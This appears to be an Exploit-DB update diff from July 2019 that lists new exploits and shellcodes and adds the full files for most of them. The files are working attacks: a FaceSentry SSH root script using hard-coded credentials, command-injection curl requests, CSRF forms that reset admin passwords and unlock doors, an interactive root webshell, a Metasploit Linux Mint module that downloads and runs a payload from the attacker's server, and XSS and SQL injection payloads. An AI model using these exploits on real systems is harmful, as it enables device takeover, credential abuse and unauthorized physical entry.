DB: 2019-07-02

24 changes to exploits/shellcodes

Linux Mint 18.3-19.1 - 'yelp' Command Injection
FaceSentry Access Control System 6.4.8 - Remote SSH Root
WorkSuite PRM 2.4 - 'password' SQL Injection
CiuisCRM 1.6 - 'eventType' SQL Injection
Varient 1.6.1 - SQL Injection
PowerPanel Business Edition - Cross-Site Scripting
ZoneMinder 1.32.3 - Cross-Site Scripting
SAP Crystal Reports - Information Disclosure
Sahi pro 8.x - Directory Traversal
CyberPanel 1.8.4 - Cross-Site Request Forgery
FaceSentry Access Control System 6.4.8 - Remote Command Injection
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery
FaceSentry Access Control System 6.4.8 - Remote Root Exploit

Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes)
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)
Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)
Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes)
Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)
Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)
Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)
Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)

exploits/hardware/remote/47067.py

@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit
+#
+#
+# Vendor: iWT Ltd.
+# Product web page: http://www.iwt.com.hk
+# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+#                   Firmware 5.7.2 build 568 (Algorithm A14)
+#                   Firmware 5.7.0 build 539 (Algorithm A14)
+#
+# Summary: FaceSentry 5AN is a revolutionary smart identity
+# management appliance that offers entry via biometric face
+# identification, contactless smart card, staff ID, or QR-code.
+# The QR-code upgrade allows you to share an eKey with guests
+# while you're away from your Office and monitor all activity
+# via the web administration tool. Powered by standard PoE
+# (Power over Ethernet), FaceSEntry 5AN can be installed in
+# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+# grade access control or time-and-attendance appliance.
+#
+# Desc: FaceSentry facial biometric access control appliance
+# ships with hard-coded and weak credentials for SSH access
+# on port 23445 using the credentials wwwuser:123456. The root
+# privilege escalation is done by abusing the insecure sudoers
+# entry file.
+#
+# ================================================================
+# lqwrm@metalgear:~$ python ssh_root.py 192.168.11.1
+# [+] Connecting to 192.168.11.1 on port 23445: Done
+# [*] wwwuser@192.168.11.1:
+#     Distro    Ubuntu 16.04
+#     OS:       linux
+#     Arch:     Unknown
+#     Version:  4.10.0
+#     ASLR:     Enabled
+#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
+# [+] Opening new channel: 'shell': Done
+# [*] Switching to interactive mode
+# wwwuser@TWR01:~$ pwd
+# /home/wwwuser
+# wwwuser@TWR01:~$ sudo -l 
+# Matching Defaults entries for wwwuser on localhost:
+# env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+#
+# User wwwuser may run the following commands on localhost:
+#     (root) NOPASSWD: /sbin/service, PROCESSES, NETWORKING, REBOOT, IPTABLES, /faceGuard/bin/*, /faceGuard/database/Restore*, /bin/date, /bin/cat, /bin/echo, /faceGuard/bin/phpbin/*, /bin/sed, /sbin/*, /usr/sbin/*, /bin/*, /usr/bin/*
+# wwwuser@TWR01:~$ sudo cat /etc/sudoers.d/sudoers.sentry
+# Cmnd_Alias SENTRY = /faceGuard/bin/*
+# Cmnd_Alias SENTRY_DB_RESTORE = /faceGuard/database/Restore*
+# Cmnd_Alias DATE = /bin/date
+# Cmnd_Alias CAT = /bin/cat
+# Cmnd_Alias ECHO = /bin/echo
+# Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm
+# Cmnd_Alias SENTRYWEB = /faceGuard/bin/phpbin/*
+# Cmnd_Alias SED = /bin/sed
+# Cmnd_Alias SERVICES = /sbin/service
+# Cmnd_Alias SBIN = /sbin/*, /usr/sbin/*
+# Cmnd_Alias BIN = /bin/*, /usr/bin/*
+#
+# wwwuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
+# iwtuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
+# wwwuser@TWR01:~$ id
+# uid=1001(wwwuser) gid=1001(wwwuser) groups=1001(wwwuser),27(sudo)
+# wwwuser@TWR01:~$ sudo su
+# root@TWR01:/home/wwwuser# id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@TWR01:/home/wwwuser# exit
+# exit
+# wwwuser@TWR01:~$ exit
+# logout
+# [*] Got EOF while reading in interactive
+# [*] Closed SSH channel with 192.168.11.1
+# lqwrm@metalgear:~$
+# ================================================================
+#
+# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+#            Linux 3.4.113-sun8i (armv7l)
+#            PHP/7.0.30-0ubuntu0.16.04.1
+#            PHP/7.0.22-0ubuntu0.16.04.1
+#            lighttpd/1.4.35
+#            Armbian 5.38
+#            Sunxi Linux (sun8i generation)
+#            Orange Pi PC +
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5526
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php
+#
+#
+# 28.05.2019
+#
+
+from pwn import *
+
+if len(sys.argv) < 2:
+    print 'Usage: ./fs.py <ip>\n'
+    sys.exit()
+
+ip = sys.argv[1]
+rshell = ssh('wwwuser', ip, password='123456', port=23445)
+rshell.interactive()

exploits/hardware/webapps/47064.txt

@@ -0,0 +1,123 @@
+FaceSentry Access Control System 6.4.8 Remote Command Injection
+
+
+Vendor: iWT Ltd.
+Product web page: http://www.iwt.com.hk
+Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+                  Firmware 5.7.2 build 568 (Algorithm A14)
+                  Firmware 5.7.0 build 539 (Algorithm A14)
+
+Summary: FaceSentry 5AN is a revolutionary smart identity
+management appliance that offers entry via biometric face
+identification, contactless smart card, staff ID, or QR-code.
+The QR-code upgrade allows you to share an eKey with guests
+while you're away from your Office and monitor all activity
+via the web administration tool. Powered by standard PoE
+(Power over Ethernet), FaceSEntry 5AN can be installed in
+minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+grade access control or time-and-attendance appliance.
+
+Desc: FaceSentry suffers from an authenticated OS command
+injection vulnerability using default credentials. This can
+be exploited to inject and execute arbitrary shell commands
+as the root user via the 'strInIP' and 'strInPort' parameters
+(POST) in pingTest and tcpPortTest PHP scripts.
+
+==============================================================
+/pingTest.php:
+--------------
+8:  if (!isAuth('TestTools','R')){
+9:      echo "No Permission";
+10:     include("footer.php");
+11:     exit;
+12:  }
+13:
+14: if(isset($_POST["strInIP"])){
+15:     $strInIP = $_POST["strInIP"];
+16: }else{
+17:     $strInIP = "";
+18: }
+19:
+20: $strOperationResult = "";
+21: if ($strInIP != ""){
+22:
+23:    $out = array();
+24:    exec("sudo ping -c 4 $strInIP",$out);
+25:    $result = "";
+26:    foreach($out as $line){
+27:        $result = $result.$line."<br>";
+28:    }
+
+--------------------------------------------------------------
+/tcpPortTest.php:
+-----------------
+14: if (isset($_POST["strInIP"])){
+15:     $strInIP = $_POST["strInIP"];
+16: }else{
+17:     $strInIP = "";
+18: }
+19: if (isset($_POST["strInPort"])){
+20:     $strInPort = $_POST["strInPort"];
+21: }else{
+22:     $strInPort = "";
+23: }
+..
+..
+53: $strOperationResult = "";
+54: if ($strInIP != "" and $strInPort != ""){
+55:     $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
+56:     system("date>>".TCP_PORT_TEST);
+57:     if (!$fp) {
+58:         $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
+59:         system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
+60:     } else {
+61:         fclose($fp);
+62:         $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
+63:         system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
+64:     }
+65: }
+==============================================================
+
+Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+           Linux 3.4.113-sun8i (armv7l)
+           PHP/7.0.30-0ubuntu0.16.04.1
+           PHP/7.0.22-0ubuntu0.16.04.1
+           lighttpd/1.4.35
+           Armbian 5.38
+           Sunxi Linux (sun8i generation)
+           Orange Pi PC +
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5523
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
+
+
+28.05.2019
+
+--
+
+
+$ curl -X POST 'http://192.168.11.1/tcpPortTest.php' \
+       --data 'strInIP=1.2.3.4`sudo id > garbage.txt`&strInPort=80' \
+       -H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
+
+$ curl http://192.168.11.1/garbage.txt
+uid=0(root) gid=0(root) groups=0(root)
+
+
+--------------------------------------------------------------------------------
+
+
+$ curl -X POST 'http://192.168.11.1/pingTest.php' \
+       --data 'strInIP=;sudo id' \
+       -H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
+       |grep uid
+
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100  7726    0  7697  100    29  10180     38 --:--:-- --:--:-- --:--:-- 10181
+<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">

exploits/hardware/webapps/47065.txt

@@ -0,0 +1,148 @@
+FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery
+
+
+Vendor: iWT Ltd.
+Product web page: http://www.iwt.com.hk
+Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+                  Firmware 5.7.2 build 568 (Algorithm A14)
+                  Firmware 5.7.0 build 539 (Algorithm A14)
+
+Summary: FaceSentry 5AN is a revolutionary smart identity
+management appliance that offers entry via biometric face
+identification, contactless smart card, staff ID, or QR-code.
+The QR-code upgrade allows you to share an eKey with guests
+while you're away from your Office and monitor all activity
+via the web administration tool. Powered by standard PoE
+(Power over Ethernet), FaceSEntry 5AN can be installed in
+minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+grade access control or time-and-attendance appliance.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+           Linux 3.4.113-sun8i (armv7l)
+           PHP/7.0.30-0ubuntu0.16.04.1
+           PHP/7.0.22-0ubuntu0.16.04.1
+           lighttpd/1.4.35
+           Armbian 5.38
+           Sunxi Linux (sun8i generation)
+           Orange Pi PC +
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5524
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
+
+
+28.05.2019
+
+--
+
+
+CSRF change administrator password:
+-----------------------------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/personalSetting.php" method="POST">
+      <input type="hidden" name="strInAction" value="updateUser" />
+      <input type="hidden" name="strInUserID" value="administrator" />
+      <input type="hidden" name="isChangePwd" value="1" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInPassword" value="t00tw00t />
+      <input type="hidden" name="strInConfirmPassword" value="t00tw00t" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+CSRF add admin:
+---------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/userList.php?" method="POST">
+      <input type="hidden" name="strInAction" value="addUser" />
+      <input type="hidden" name="strInUserID" value="Testinugs" />
+      <input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
+      <input type="hidden" name="strInDescription" value="CSRFd" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInPassword" value="123123" />
+      <input type="hidden" name="strInConfirmPassword" value="123123" />
+      <input type="hidden" name="strInStatus" value="Active" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+Change administrator password via different path:
+-------------------------------------------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/userList.php?" method="POST">
+      <input type="hidden" name="strInAction" value="updateUser" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strInUserID" value="administrator" />
+      <input type="hidden" name="isChangePwd" value="1" />
+      <input type="hidden" name="strInDescription" value="Default&#32;Sys&#46;&#32;Admin" />
+      <input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInStatus" value="Active" />
+      <input type="hidden" name="strInPassword" value="123456" />
+      <input type="hidden" name="strInConfirmPassword" value="123456" />
+      <input type="hidden" name="strEditPageNo" value="" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+Add special card:
+-----------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/specialCard.php?" method="POST">
+      <input type="hidden" name="strInSpecialCardID" value="deadbeef" />
+      <input type="hidden" name="strInSpecialCardStatus" value="" />
+      <input type="hidden" name="strInSpecialCardEnrollHigh" value="1" />
+      <input type="hidden" name="strInSpecialCardEnrollLow" value="1" />
+      <input type="hidden" name="strInSpecialCardRescue" value="1" />
+      <input type="hidden" name="strInSpecialCardOpenDoor" value="1" />
+      <input type="hidden" name="strInSpecialCardReboot" value="1" />
+      <input type="hidden" name="strInSpecialCardShutDown" value="1" />
+      <input type="hidden" name="strInAction" value="addNewSpecialCard" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strEditPageNo" value="" />
+      <input type="hidden" name="strInNewSpecialCard" value="deadbeef" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+CSRF open door 0:
+-----------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/openDoor.php?" method="POST">
+      <input type="hidden" name="strInAction" value="openDoor" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strInRestartAction" value="" />
+      <input type="hidden" name="strPanelIDRestart=" value="" />
+      <input type="hidden" name="strPanelRestartAction" value="" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/47066.py

@@ -0,0 +1,216 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# FaceSentry Access Control System 6.4.8 Remote Root Exploit
+#
+#
+# Vendor: iWT Ltd.
+# Product web page: http://www.iwt.com.hk
+# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+#                   Firmware 5.7.2 build 568 (Algorithm A14)
+#                   Firmware 5.7.0 build 539 (Algorithm A14)
+#
+# Summary: FaceSentry 5AN is a revolutionary smart identity
+# management appliance that offers entry via biometric face
+# identification, contactless smart card, staff ID, or QR-code.
+# The QR-code upgrade allows you to share an eKey with guests
+# while you're away from your Office and monitor all activity
+# via the web administration tool. Powered by standard PoE
+# (Power over Ethernet), FaceSEntry 5AN can be installed in
+# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+# grade access control or time-and-attendance appliance.
+#
+# Desc: FaceSentry suffers from an authenticated OS command
+# injection vulnerability using default credentials. This can
+# be exploited to inject and execute arbitrary shell commands
+# as the root user via the 'strInIP' POST parameter in pingTest
+# PHP script.
+#
+# ==============================================================
+# /pingTest.php:
+# --------------
+# 8:  if (!isAuth('TestTools','R')){
+# 9:      echo "No Permission";
+# 10:     include("footer.php");
+# 11:     exit;
+# 12:  }
+# 13:
+# 14: if(isset($_POST["strInIP"])){
+# 15:     $strInIP = $_POST["strInIP"];
+# 16: }else{
+# 17:     $strInIP = "";
+# 18: }
+# 19:
+# 20: $strOperationResult = "";
+# 21: if ($strInIP != ""){
+# 22:
+# 23:    $out = array(); 
+# 24:    exec("sudo ping -c 4 $strInIP",$out);
+# 25:    $result = "";    
+# 26:    foreach($out as $line){
+# 27:        $result = $result.$line."<br>";        
+# 28:    }
+# ==============================================================
+#
+# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+#            Linux 3.4.113-sun8i (armv7l)
+#            PHP/7.0.30-0ubuntu0.16.04.1
+#            PHP/7.0.22-0ubuntu0.16.04.1
+#            lighttpd/1.4.35
+#            Armbian 5.38
+#            Sunxi Linux (sun8i generation)
+#            Orange Pi PC +
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5525
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php
+#
+#
+# 28.05.2019
+#
+
+import datetime########INITIALIZE
+import urllib2#########BIOMETRICS
+import urllib##########FACIAL.REC
+import time############OGNITION.S
+import sys##(.)###(.)##YSTEM.DOOR
+import re#######O######UNLOCKED.A
+import os#######_######CCESS.GRAN
+import io######(_)#####TED.0B1000
+import py##############1.11111011
+
+from cookielib import CookieJar
+
+global pajton
+pajton = os.path.basename(sys.argv[0])
+
+def usage():
+    if len(sys.argv) < 2:
+        print '[+] Usage: ./' + pajton + ' <ip>\n'
+        sys.exit()
+
+def auth():
+    brojac = 0
+    usernames = [ 'admin', 'user', 'administrator' ] # case sensitive
+    passwords = [ '123', '123', '123456' ]
+    while brojac < 3:
+        podatoci = { 'strInLogin'    : usernames[brojac],
+                     'strInPassword' : passwords[brojac],
+                     'saveLogin'     : '1',
+                     'saveFor'       : '168' } # 7 days
+        print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]
+        nesto_encode = urllib.urlencode(podatoci)
+        ajde.open('http://' + target + '/login.php', nesto_encode)
+        check = ajde.open('http://' + target + '/sentryInfo.php')
+        dool = re.search(r'Hardware Key', check.read())
+        if dool:
+            print '[+] That worked!'
+            break
+        else:
+            brojac += 1
+            if brojac == 3:
+                print '[!] Ah ah ah. You didn\'t say the magic word!'
+                sys.exit()
+
+def door():
+    unlock = raw_input('[*] Unlock door No.: ') # default door number = 0
+    try:
+        br = int(unlock)
+        panel = { 'strInAction'           : 'openDoor',
+                  'strInPanelNo'          : br,
+                  'strInRestartAction'    : '',
+                  'strPanelIDRestart'     : '',
+                  'strPanelRestartAction' : '' }
+        nesto_encode = urllib.urlencode(panel)
+        ajde.open('http://' + target + '/openDoor.php', nesto_encode)
+        print '[+] Door ' + unlock + ' is unlocked!'
+    except ValueError:
+        print '[!] Only values from 0 to 8 are valid.'
+        door()
+
+def main():
+    if os.name == 'posix':
+        os.system('clear')
+    if os.name == 'nt':
+        os.system('cls')
+
+    vremetodeneska = datetime.datetime.now()
+    kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
+    print 'Starting exploit at ' + kd
+
+    print '''
+──────────────────────────────────
+──FaceSentry Access Control System
+────────Remote Root Exploit
+─────────Zero Science Lab
+────────www.zeroscience.mk
+───────────ZSL-2019-5525
+─────────────▄▄▄▄▄▄▄▄▄
+─────────────▌▐░▀░▀░▀▐
+─────────────▌░▌░░░░░▐
+─────────────▌░░░░░░░▐
+─────────────▄▄▄▄▄▄▄▄▄
+───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄
+──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█
+─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌
+─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌
+─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌
+─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌
+──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█
+──────▐░░░░▌─▌███▌███▌─▐░░░░▌
+───────▀▀▀▀──▌███▌███▌──▀▀▀▀
+─────────────▌███▌███▌
+─────────────▌███▌███▌
+───────────▐▀▀▀██▌█▀▀▀▌
+▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒
+    '''
+
+    usage()
+    tegla = CookieJar()
+    global ajde, target
+    target = sys.argv[1]
+    ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
+    auth()
+    raw_input('\n[*] Press [ENTER] to land... ')
+
+    print '[+] Entering interactive (web)shell...'
+    time.sleep(1)
+    print
+
+    while True:
+        try:
+            cmd = raw_input('root@facesentry:~# ')
+            if 'exit' in cmd.strip():
+                print '[+] Take care now, bye bye then!'
+                break
+            if 'door' in cmd.strip():
+                door()
+                continue
+            podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
+            nesto_encode = urllib.urlencode(podatoci)
+            r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
+            pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
+            x = pattern.groups()[0].strip()
+            y = x.replace('<br>', '\n')
+            print y.strip()
+        except Exception as i:
+            print '[-] Error: ' + i.message
+            pass
+        except KeyboardInterrupt as k:
+            print '\n[+] Interrupter!'
+            sys.exit()
+
+    sys.exit()
+
+if __name__ == "__main__":
+    main()

exploits/linux/remote/47047.rb

@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+# Exploit from github repro: https://github.com/b1ack0wl/linux_mint_poc
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Linux Mint 'yelp' URI handler command injection vulnerability",
+      'Description'    => %q{
+          This module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within 
+          Linux Mint's "ubuntu-system-adjustments" package. Invoking any one the URI handlers will call 
+          the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument. 
+          The script will then search for the strings "gnome-help" or "ubuntu-help" and if doesn't find either 
+          of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit 
+          this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b1ack0wl' # vuln discovery and exploit dev
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 60
+        },
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Linux Mint 18.3 and 19.1',
+            {
+              'Arch' => ARCH_X64
+            } 
+          ]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0))
+  end
+
+  def generate_exploit_html()
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['LHOST']
+    else
+      srv_host = datastore['SRVHOST']
+    end
+    @filename = rand_text_alpha(4)
+    cmd_inj = "curl http://#{srv_host}:#{datastore['SRVPORT']}/#{@service_path} -o /tmp/#{@filename};chmod 777 /tmp/#{@filename};/tmp/#{@filename} &".gsub(' ','$IFS$()') # Cheap way to add spaces since chrome percent encodes spaces (%20).
+    html = %Q|
+    <html>
+    <head>
+      <meta content="text/html;charset=utf-8" http-equiv="Content-Type">
+      <meta content="utf-8" http-equiv="encoding">
+      <title>paparoachfanclubdotcom</title>
+    </head>
+    <body>
+    <script>
+      lmao = document.createElement('a');
+      lmao.href= "ghelp://$(#{cmd_inj})";
+      document.body.appendChild(lmao); /* Needed to work with Firefox */
+      lmao.click();
+    </script>
+    </body>
+    </html>
+    |
+    return html
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    if agent =~ /curl\/\d/
+      # Command has been executed. Serve up the payload
+      exe_payload = generate_payload_exe()
+      print_status("Sending payload...")
+      send_response(cli, exe_payload)
+      register_file_for_cleanup("/tmp/#{@filename}")
+      return
+    else
+      html = generate_exploit_html()
+      print_status("Sending HTML...")
+      send_response(cli, html, {'Content-Type'=>'text/html'})
+    end
+  end
+end

exploits/linux/webapps/47059.txt

@@ -0,0 +1,38 @@
+# Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)
+# Google Dork: None
+# Date: 6/29/2019
+# Exploit Author: Joey Lane
+# Vendor Homepage: https://www.cyberpowersystems.com
+# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
+# Version: 3.4.0
+# Tested on: Ubuntu 16.04
+# CVE : Pending
+
+CyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability.  The fields used to configure SNMP trap receivers are not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.
+
+To demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<ppbe>
+<target>
+<command>action.notification.trapRecipient.setup</command>
+</target>
+<inquire>
+<trapRecipientSetup>
+<action>ADD</action>
+<trapRecipient>
+<name><script>alert(1)</script></name>
+<status>true</status>
+<type>1</type>
+<ipAddress>127.0.0.1</ipAddress>
+<community>public</community>
+</trapRecipient>
+</trapRecipientSetup>
+</inquire>
+</ppbe>
+
+Now execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:
+
+curl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie "JSESSIONID=(A VALID SESSION ID)" http://(A VALID HOST):3052/agent/ppbe.xml
+
+Visiting the Event Action / Recipient page will execute the posted javascript code.

exploits/multiple/webapps/47058.txt

@@ -0,0 +1,21 @@
+===========================================================================================
+# Exploit Title: Varient 1.6.1 SQL Inj.
+# Dork: N/A
+# Date: 29-06-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://varient.codingest.com/
+# Software Link: https://varient.codingest.com/
+# Version: v1.6.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: the best news and magazine script
+===========================================================================================
+# POC - SQLi
+# Parameters : user_id
+# Attack Pattern :
+%27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199
+# POST Method :
+https://site.com/unpleasant-nor-diminution-excellence-apartments-imprudence?parent_id=0&post_id=66&name=9956574&comment=[COMMENT
+HERE]7146048&user_id=99999999[SQL INJECT HERE]
+===========================================================================================

exploits/multiple/webapps/47061.txt

@@ -0,0 +1,17 @@
+# Exploit Title: [Sensitive Information Disclosure in SAP Crystal Reports]
+# Date: [2019-04-10]
+# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
+# Vendor Homepage: [https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114]
+# Version: [SAP Crystal Reports for Visual Studio, Version - 2010] (REQUIRED)
+# Tested on: [Windows 10]
+# CVE : [CVE-2019-0285]
+
+POC:
+
+1- Intercept the "Export" report http request
+
+2- Copy the "__CRYSTALSTATE" + <crystal report user control> Viewer name parameter value. 
+
+3- You will find a base64 value in "viewerstate" attribute. 
+
+4- decode the value you will get database information such as: name, credentials, Internal Path disclosure and some debugging information.

exploits/multiple/webapps/47062.py

@@ -0,0 +1,40 @@
+# Exploit Title: Sahi pro (8.x) Directory traversal
+# Date: 25/06/2019
+# Exploit Author: Alexander Bluestein
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 8.0
+# Tested on: Linux Ubuntu / Windows 7
+# CVE: CVE-2019-13063
+
